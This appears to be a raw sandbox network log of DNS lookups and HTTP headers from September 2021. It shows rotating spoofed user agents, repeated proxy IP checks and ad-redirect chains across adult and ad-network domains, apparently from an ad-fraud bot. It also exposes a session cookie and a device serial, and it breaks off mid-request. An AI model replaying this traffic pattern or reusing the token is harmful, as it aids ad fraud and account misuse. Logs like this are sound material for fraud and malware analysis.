X-Amz-Cf-Id: GOb-2qgGomBK7TAG7PnmLxUze0vNnEO7zCCCRTatMs-gVZhK5jiGFw==
-
GEThttp://masde.info/ads.phpRequestGET /ads.php HTTP/1.1
Host: masde.info
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:49:46 GMT
Content-Length: 57785
Connection: close
-
DNShubporn.usRequesthubporn.usIN AResponsehubporn.usIN A207.180.237.38
-
DNSadf.lyRequestadf.lyIN AResponseadf.lyIN A104.20.82.199adf.lyIN A104.20.81.199adf.lyIN A172.67.19.54
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
GEThttp://hubporn.us/goadv.phpRequestGET /goadv.php HTTP/1.1
Host: hubporn.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; MALC; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
DNSwait5sec.comRequestwait5sec.comIN AResponsewait5sec.comIN A104.21.43.79wait5sec.comIN A172.67.175.185
-
DNSwww.fpcpopunder.comRequestwww.fpcpopunder.comIN AResponsewww.fpcpopunder.comIN CNAMEfpcpopunder.comfpcpopunder.comIN A66.154.95.74
-
GEThttp://alfad.pro/go/266933/627545RequestGET /go/266933/627545 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.170 Safari/537.36 OPR/53.0.2907.99
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:49:52 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 272
Connection: keep-alive
-
GEThttp://alfad.pro/go/266933/622931RequestGET /go/266933/622931 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64; rv:25.8) Gecko/20151126 Firefox/31.9 PaleMoon/25.8.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:49:52 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 271
Connection: keep-alive
-
DNSsafebrowsing.googleapis.comRequestsafebrowsing.googleapis.comIN AResponsesafebrowsing.googleapis.comIN A142.250.179.202
-
DNSkrk.kargo.comRequestkrk.kargo.comIN AResponsekrk.kargo.comIN A52.71.50.199krk.kargo.comIN A52.205.123.115krk.kargo.comIN A3.224.202.137krk.kargo.comIN A3.225.49.235krk.kargo.comIN A3.233.169.27krk.kargo.comIN A3.216.96.138krk.kargo.comIN A107.21.0.187krk.kargo.comIN A107.22.61.52
-
DNSaigneloa.comRequestaigneloa.comIN AResponseaigneloa.comIN A139.45.197.250
-
DNSbam-cell.nr-data.netRequestbam-cell.nr-data.netIN AResponsebam-cell.nr-data.netIN CNAMEtls12.newrelic.com.cdn.cloudflare.nettls12.newrelic.com.cdn.cloudflare.netIN A162.247.243.146tls12.newrelic.com.cdn.cloudflare.netIN A162.247.243.147
-
DNSifake.proRequestifake.proIN AResponseifake.proIN A45.76.155.77
-
GEThttp://ifake.pro/ip?serial_number=DX3RCQSYFFDNRequestGET /ip?serial_number=DX3RCQSYFFDN HTTP/1.1
Host: ifake.pro
Accept: */*
Pragma: no-cache
Connection: keep-alive
Cookie: connect.sid=s%3A_srCe3PHFJKFrzYpG8CVKI1R-gcTtlnJ.sFCAaYPFVn1uB8dlZolPKxepiHDQI9DQIn9FBNWgkcA
User-Agent: iFakeProTools/5.9.6 CFNetwork/978.0.7 Darwin/18.7.0
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: keep-alive
ResponseHTTP/1.1 200 OK
X-Powered-By: iThanh
Vary: Origin, Accept-Encoding
Access-Control-Allow-Credentials: true
Strict-Transport-Security: max-age=5184000; includeSubDomains
Content-Type: text/html; charset=utf-8
Content-Length: 12
ETag: W/"c-T+jtdWoufQlJnZYss//Zp9PiBJU"
Date: Mon, 06 Sep 2021 09:49:54 GMT
Connection: keep-alive
-
DNSapis.google.comRequestapis.google.comIN AResponseapis.google.comIN CNAMEplus.l.google.complus.l.google.comIN A142.250.179.142
-
DNScsm.nl.eu.criteo.netRequestcsm.nl.eu.criteo.netIN AResponsecsm.nl.eu.criteo.netIN CNAMEcsm.am5.vip.prod.criteo.netcsm.am5.vip.prod.criteo.netIN A178.250.2.150
-
DNSadmin.bitninja.ioRequestadmin.bitninja.ioIN AResponseadmin.bitninja.ioIN CNAMEapi.bitninja.ioapi.bitninja.ioIN A148.72.132.201api.bitninja.ioIN A148.72.132.217api.bitninja.ioIN A148.72.132.215api.bitninja.ioIN A148.72.132.216
-
DNSs3-eu-west-1.amazonaws.comRequests3-eu-west-1.amazonaws.comIN AResponses3-eu-west-1.amazonaws.comIN A52.218.100.35
-
DNSjs.wpadmngr.comRequestjs.wpadmngr.comIN AResponsejs.wpadmngr.comIN CNAMEcdn28786515.ahacdn.mecdn28786515.ahacdn.meIN A213.174.135.24cdn28786515.ahacdn.meIN A213.174.135.25
-
DNSbigtit.xyzRequestbigtit.xyzIN AResponsebigtit.xyzIN A207.180.237.38
-
DNSmorenews.usRequestmorenews.usIN AResponsemorenews.usIN A207.180.237.38
-
DNSxxx4.sexybride.xyzRequestxxx4.sexybride.xyzIN AResponsexxx4.sexybride.xyzIN A194.59.164.58
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49adserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9
-
GEThttp://xxx4.sexybride.xyz/xxx4.phpRequestGET /xxx4.php HTTP/1.1
Host: xxx4.sexybride.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/604.5.6 (KHTML, like Gecko) Version/11.0.3 Safari/604.5.6
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:49:57 GMT
Content-Length: 13730
Connection: close
-
GEThttp://alfad.pro/go/266933/626199RequestGET /go/266933/626199 HTTP/1.1
Host: alfad.pro
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Content-Encoding: gzip
Content-Type: text/html
Date: Mon, 06 Sep 2021 09:49:57 GMT
Server: nginx
Vary: Accept-Encoding
Content-Length: 272
Connection: keep-alive
-
GEThttp://bigtit.xyz/goadv.phpRequestGET /goadv.php HTTP/1.1
Host: bigtit.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:57 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
GEThttp://morenews.us/index.htmRequestGET /index.htm HTTP/1.1
Host: morenews.us
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; CMDTDF; .NET4.0C; .NET4.0E)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:57 GMT
Content-Type: text/html
Content-Length: 101
Last-Modified: Thu, 26 Aug 2021 08:28:30 GMT
Connection: keep-alive
ETag: "612750ae-65"
Accept-Ranges: bytes
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:58 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
GEThttp://tracking.leomob.com/track?awno=lm133&oid=3236727&devid=1a636c1a-536f-44a1-aa8e-e0d9edf864bd&aff_sub=8al969NIt8vv0_QqtrUUAmj1HM9QdjNk&subUuid=1136301_452RequestGET /track?awno=lm133&oid=3236727&devid=1a636c1a-536f-44a1-aa8e-e0d9edf864bd&aff_sub=8al969NIt8vv0_QqtrUUAmj1HM9QdjNk&subUuid=1136301_452 HTTP/1.1
Host: tracking.leomob.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 9; Pixel 2 XL Build/PQ1A.181105.017.A1) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/85.0.4183.101 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
X-Requested-With: com.android.chrome
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
ResponseHTTP/1.1 302 Found
Date: Mon, 06 Sep 2021 09:49:59 GMT
Content-Length: 0
Connection: keep-alive
Server: Tengine/2.2.2
Location: https://ccapi.g2afse.com/click?pid=167&offer_id=1349085&sub1=postback1325399cc%257B%2522devid%2522%253A%25221a636c1a-536f-44a1-aa8e-e0d9edf864bd%2522%252C%2522aff_sub%2522%253A%25228al969NIt8vv0_QqtrUUAmj1HM9QdjNk%2522%252C%2522awno%2522%253A%2522lm133%2522%252C%2522subUuid%2522%253A%25221136301_452%2522%252C%2522oid%2522%253A%25223236727%2522%252C%2522awt%2522%253A%2522noinxnnkjnqwnx%2522%252C%2522rip%2522%253A%2522154.61.71.51%2522%257D&sub2=lm1331136301_452&sub5=
Content-Language: en-US
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:49:59 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSnkwintenc.bizRequestnkwintenc.bizIN AResponsenkwintenc.bizIN A13.226.155.21nkwintenc.bizIN A13.226.155.122nkwintenc.bizIN A13.226.155.26nkwintenc.bizIN A13.226.155.74
-
DNSretributionsaloon.xyzRequestretributionsaloon.xyzIN AResponseretributionsaloon.xyzIN A34.196.13.28
-
DNSalfad.proRequestalfad.proIN AResponsealfad.proIN CNAMEadserver-2084671375.us-east-1.elb.amazonaws.comadserver-2084671375.us-east-1.elb.amazonaws.comIN A54.236.207.160adserver-2084671375.us-east-1.elb.amazonaws.comIN A52.21.78.9adserver-2084671375.us-east-1.elb.amazonaws.comIN A107.21.8.49
-
DNSbongacams7.comRequestbongacams7.comIN AResponsebongacams7.comIN A94.199.249.164bongacams7.comIN A185.75.253.110
-
GEThttp://retributionsaloon.xyz/RequestGET / HTTP/1.1
Host: retributionsaloon.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:02 GMT
Content-Type: text/html
Content-Length: 928
Connection: close
Expires: Mon, 31 Dec 2001 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-store, no-cache, pre-check=0, post-check=0
X-Content-Type-Options: nosniff
-
DNSicotrack.netRequesticotrack.netIN AResponseicotrack.netIN A109.206.168.17
-
DNS51789.ruRequest51789.ruIN AResponse51789.ruIN A212.107.18.203
-
DNSlangke.fr.amRequestlangke.fr.amIN AResponselangke.fr.amIN A212.107.18.203
-
DNSjav69.vipRequestjav69.vipIN AResponsejav69.vipIN A167.86.121.34
-
GEThttp://51789.ru/adv.htmlRequestGET /adv.html HTTP/1.1
Host: 51789.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:02 GMT
Content-Length: 57786
Connection: close
-
GEThttp://jav69.vip/index.htmRequestGET /index.htm HTTP/1.1
Host: jav69.vip
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0; KTXN B668564439A118785T1297416P2) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:01 GMT
Content-Type: text/html
Content-Length: 104
Last-Modified: Tue, 24 Aug 2021 09:28:00 GMT
Connection: keep-alive
ETag: "6124bba0-68"
Accept-Ranges: bytes
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:04 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSmaodes.comRequestmaodes.comIN AResponsemaodes.comIN A5.181.218.143
-
DNSiyfnzgb.comRequestiyfnzgb.comIN AResponseiyfnzgb.comIN A208.91.196.46
-
DNSwait5sec.comRequestwait5sec.comIN AResponsewait5sec.comIN A172.67.175.185wait5sec.comIN A104.21.43.79
-
DNSpornhub.bidRequestpornhub.bidIN AResponsepornhub.bidIN A207.180.237.38
-
DNSgetauohome.xyzRequestgetauohome.xyzIN AResponsegetauohome.xyzIN A207.180.237.38
-
DNSlogger007.cam4.comRequestlogger007.cam4.comIN AResponselogger007.cam4.comIN A184.94.152.23
-
GEThttp://a.adtng.com/get/10002799?ata=exoclick_nutaku&apb=oodNZXHNPbHNPPHPPa7gmbqLZ7KrKHVXTy2z00uldRLKqeqV1UtrqZnUOmrdK6V0rpqLanUSzT22UunuttqlsdK6Z0rpXSuldM6V0rpXVzUVb0WWb70z72R13VWUUT1zUTT1XSuzpoun41onrurtt3ls4u00q4mrrmp2o4rdK5SgKVGpbHTT2yqrllc6V0rpXVUuldK6V0rpnB9gRequestGET /get/10002799?ata=exoclick_nutaku&apb=oodNZXHNPbHNPPHPPa7gmbqLZ7KrKHVXTy2z00uldRLKqeqV1UtrqZnUOmrdK6V0rpqLanUSzT22UunuttqlsdK6Z0rpXSuldM6V0rpXVzUVb0WWb70z72R13VWUUT1zUTT1XSuzpoun41onrurtt3ls4u00q4mrrmp2o4rdK5SgKVGpbHTT2yqrllc6V0rpXVUuldK6V0rpnB9g HTTP/1.1
Host: a.adtng.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://syndication.exosrv.com/ads-iframe-display.php?idzone=3827573&type=300x250&p=http%3A//xxnxx.xyz/index.htm&dt=1630921569499&sub=&tags=&cookieconsent=true&screen_resolution=1280x600&el=%22
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 301 Moved Permanently
Content-length: 0
Location: https://a.adtng.com/get/10002799?ata=exoclick_nutaku&apb=oodNZXHNPbHNPPHPPa7gmbqLZ7KrKHVXTy2z00uldRLKqeqV1UtrqZnUOmrdK6V0rpqLanUSzT22UunuttqlsdK6Z0rpXSuldM6V0rpXVzUVb0WWb70z72R13VWUUT1zUTT1XSuzpoun41onrurtt3ls4u00q4mrrmp2o4rdK5SgKVGpbHTT2yqrllc6V0rpXVUuldK6V0rpnB9g
-
GEThttp://pornhub.bid/index.htmlRequestGET /index.html HTTP/1.1
Host: pornhub.bid
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/8.0; .NET4.0C; .NET4.0E; InfoPath.3; Zoom 3.6.0; ms-office; MSOffice 15)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:07 GMT
Content-Type: text/html
Last-Modified: Wed, 12 May 2021 03:27:10 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
ETag: W/"609b4b0e-6dc"
Content-Encoding: gzip
-
GEThttp://getauohome.xyz/index.htmlRequestGET /index.html HTTP/1.1
Host: getauohome.xyz
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG-SM-G920A Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.0 Chrome/38.0.2125.102 Mobile Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:07 GMT
Content-Type: text/html
Content-Length: 90
Last-Modified: Tue, 10 Aug 2021 01:57:11 GMT
Connection: keep-alive
ETag: "6111dcf7-5a"
Accept-Ranges: bytes
-
GEThttp://51789.ru/adv.htmlRequestGET /adv.html HTTP/1.1
Host: 51789.ru
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:08 GMT
Content-Length: 57786
Connection: close
-
GEThttp://maodes.com/adilla.htmlRequestGET /adilla.html HTTP/1.1
Host: maodes.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.79 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 403 Forbidden
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: 0
Server: BitNinja Captcha Server
Date: Mon, 06 Sep 2021 09:50:08 GMT
Content-Length: 57789
Connection: close
-
GEThttp://iyfnzgb.com/?pid=9PO1H9V71&dn=t33ns.topRequestGET /?pid=9PO1H9V71&dn=t33ns.top HTTP/1.1
Host: iyfnzgb.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
ResponseHTTP/1.1 200 OK
Date: Mon, 06 Sep 2021 09:50:08 GMT
Server: Apache
Referrer-Policy: no-referrer-when-downgrade
X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_I6lrBZeBw3O/pi2vD6DdwuKCuBnjSMF9k7EyRynfm7MBL9z3rToGTrAfKbaKExrqVDRxHAJc3f8FNrcZRDDx2A==
Cteonnt-Length: 3318
Keep-Alive: timeout=5, max=127
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Encoding: gzip
Content-Length: 1539
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:10 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNStranslate.googleapis.comRequesttranslate.googleapis.comIN AResponsetranslate.googleapis.comIN A142.250.179.138
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:11 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.72.89lumtest.comIN A3.94.40.55
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Connection: close
Host: lumtest.com
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:11 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNSlumtest.comRequestlumtest.comIN AResponselumtest.comIN A3.94.40.55lumtest.comIN A3.94.72.89
-
GEThttp://lumtest.com/myip.jsonRequestGET /myip.json HTTP/1.1
Host: lumtest.com
Connection: close
ResponseHTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Sep 2021 09:50:12 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 205
Connection: close
Cache-Control: no-store
Access-Control-Allow-Origin: *
-
DNScapi.connatix.comRequestcapi.connatix.comIN AResponsecapi.connatix.comIN A3.141.186.246capi.connatix.comIN A18.222.54.1capi.connatix.comIN A18.116.99.40capi.connatix.comIN A18.218.217.49capi.connatix.comIN A18.190.140.105capi.connatix.comIN A18.116.179.127capi.connatix.comIN A3.142.21.38capi.connatix.comIN A3.133.60.139
-
DNSgum.criteo.comRequestgum.criteo.comIN AResponsegum.criteo.comIN CNAMEgum.par.vip.prod.criteo.comgum.par.vip.prod.criteo.comIN A178.250.0.157
-
DNSrecaptcha.netRequestrecaptcha.netIN AResponserecaptcha.netIN A216.58.208.99
-
DNSmasde.liveRequestmasde.liveIN AResponsemasde.liveIN A212.107.18.203
-
DNSs.optnx.comRequests.optnx.comIN AResponses.optnx.comIN CNAMEtk6if76q.ab1n.nettk6if76q.ab1n.netIN A95.211.229.247tk6if76q.ab1n.netIN A95.211.229.246
-
GEThttp://s.optnx.com/cimp.php?data=TVRZek1Ea3lNVGN4Tm54bVpqVTJNRE16WlRZNFpXWXhObUUzTlRGak1XVTJZV0V3WXpZMFlUVTNaUS0tfGh0dHBzOi8vZnVycmljaXR5LW51cnN1YmFydS54eXovOTU5OTlkYTItNmUyMS00OWIyLTk1OWMtMWNjNjk4YjY2ZGI1P3pvbmVpZD0zNTc2NDExJnNvdXJjZT1hZC1tYXZlbi5jb20mdmFyaWQ9NTg5MTkwMTQma2V5d29yZD0mdGFncz1wb3JuaHViLGJpZCxhZHYscGhwJnNpdGVpZD04MTYyNjEmY2FtcGlkPTQ1NzAwMDYmY2F0aWQ9NTA4JmNvdW50cnk9VVNBJmZvcm1hdD0mY29zdD0wLjAwMDUmdGFnPW9vZE5WVEhYTkhaTkhWTTQ1YzNVVldWMHpUT3F0dW11bG1wZEs1MVV0cnFablRPbmRLNlYwcnFyYlhTdWxkSzZaMHJwWFN1bGRNNlYwcnBYVjFhYTFWeTNUYWFjVGNhMGE2YjUwVVMyV3owMDhWejJ1cmwwbXpxNDRzdW9ycWxwejI0bG9tbnRzbHAxbjBxMjJkZFBaVlpTNFFTQTZQcEhwM3M1enBYU3VsZE5LNlYwcnBYU3VsY0gyQS0tfGh0dHB8MTU0LjYxLjcxLjUxfFVTQXw0MXxhZC1tYXZlbi5jb218NTMxMjk0fDQzMDY3NXw4MTYyNjF8MzU3NjQxMXw1MDh8NDU3MDAwNnw1ODkxOTAxNHwyfDF8MHwwfDU4OHw5Mjc1NzR8NTB8NzV8VVNEfFVTRHwxfDF8MjJ8fDF8VVNBfHwxMHw0fDB8fDY1YmM1NjA5MWJiZjFmYzNjYmVhMzMwNzgyNDRmNjI4fDYwYjFhNWZmNzkzNjUwNGFkZjAzMTI4NzA0YzJiNWRkfDF8MHxwb3JuaHViLmJpZHwwfDB8MHwwLjEyfDF8MHxleGNoYW5nZV9saW5rfDB8MHwwfC0xfDB8MHx8fDJ8NzIwfHwwfDB8MHwxMHwwfDB8MXwwfE9LfGFkZWJmOWYzZDZhMzE0MDkyZGE5NGZmOTM2OWY3ZDJi&p=http%3A%2F%2Fpornhub.bid%2Fadv.php&tested=1&check=f6f2fdcdcbcb1084d3cbe541118d0e3b&screen_resolution=1024x768&container_resolution=691x425&iframe=0RequestGET 